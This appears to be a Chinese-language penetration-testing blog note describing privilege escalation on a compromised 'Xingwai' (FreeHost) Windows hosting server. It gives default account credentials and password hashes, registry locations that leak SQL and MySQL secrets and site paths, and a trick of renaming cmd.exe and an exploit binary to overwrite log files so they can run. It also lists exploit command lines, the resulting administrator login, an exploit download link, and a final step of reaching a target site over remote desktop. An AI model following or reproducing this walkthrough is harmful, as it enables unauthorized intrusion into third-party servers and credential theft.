渗透测试 - 星外笔记 - cracer哔哩哔哩

录制个提取服务器视频 其实服务器我已经拿下了 不过

有可看的地方  

星外 找不到可读可写目录 提权服务器

拒绝访问。

星外提权就是找可读可写目录

 

才有可能找到可执行目录

上传了cmd了 之前 

C:\windows\temp\Cookies\CMD.EXE

拒绝访问。

找遍了 目录没有找到可执行的目录 

这个时候可以试这找  log日记

先说两个要点

这个是星外的服务器 一看就可以知道

d:\freehost\

可以尝试星外默认帐号密码登录服务器

星外默认帐号密码

freehostrunat  

fa41328538d7be36e83ae91a78a1b16f!7

2找星外的sa密码保存处  经常破不出  就算破出来了经常连不上 

HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFreeHost\11

sa密码  ab9b161c79fbea5e44c1c78ec4821f96

找另一个泄漏  其他网站的物理路径的注册表位置

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\Virtual Roots\

这个有时候自然有用的 

给大家看一片文章 地址 ：提权服务器的 配合这个好用

http://keio2.***.com/  qita工具   记一次提权.doc 867KB  

自己看下吧 对自己提权服务器有帮助的

还有一个度注册表 获取mysql的路径  如果服务器开了3306端口可以

考虑下载mysql的root密码 也可以在asp大马的 程序 位置下载快捷方式获得路径

HKEY_LOCAL_MACHINE\SOFTWARE\MySQL AB\MySQL Server 5.0\

对路径“E:\Program Files\MySQL\MySQL Server 5.0”的访问被拒绝。

说道这里 现在继续说

目录没有找到可执行的目录 提权服务器 

c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\

这个目录虽说没有 

c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\ 可以读 不可写 

是不可以上传文件的 但我们可以尝试上传log.csv 覆盖 这个是可以的

将cmd改名为 log.csv上传是可以上传上去的

这个log.csv是我改名的cmd上传覆盖掉原先的 log.csv

c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv

这样可以执行cmd了 

但是无法执行我们的提权exp

所以继续找log日记

hchiblis.ibl  这个和前面一样 

将提权的exp  我用的星外 oday  ee.exe

是可以覆盖上传的

 hchiblis.ibl 2012-06-29 05:27:49 10.00  

星外的ee.exe下载地址 

/c c://windows/hchiblis.ibl 

c://windows/hchiblis.ibl -i

/c c://windows/hchiblis.ibl -u 724 

UserName:freehostrunat

Password:1a1b076a19155ffdc86365fa95bcfbba!7

成功提权服务器

http://keio2.cccpan.com/  qita工具  星外ee.rar 5KB[编辑]

汗  演示完了 

02a7dab3036847c0

www.***.com  这个站和之前那个是同一个服务器 目标站是这个站 连接3389网站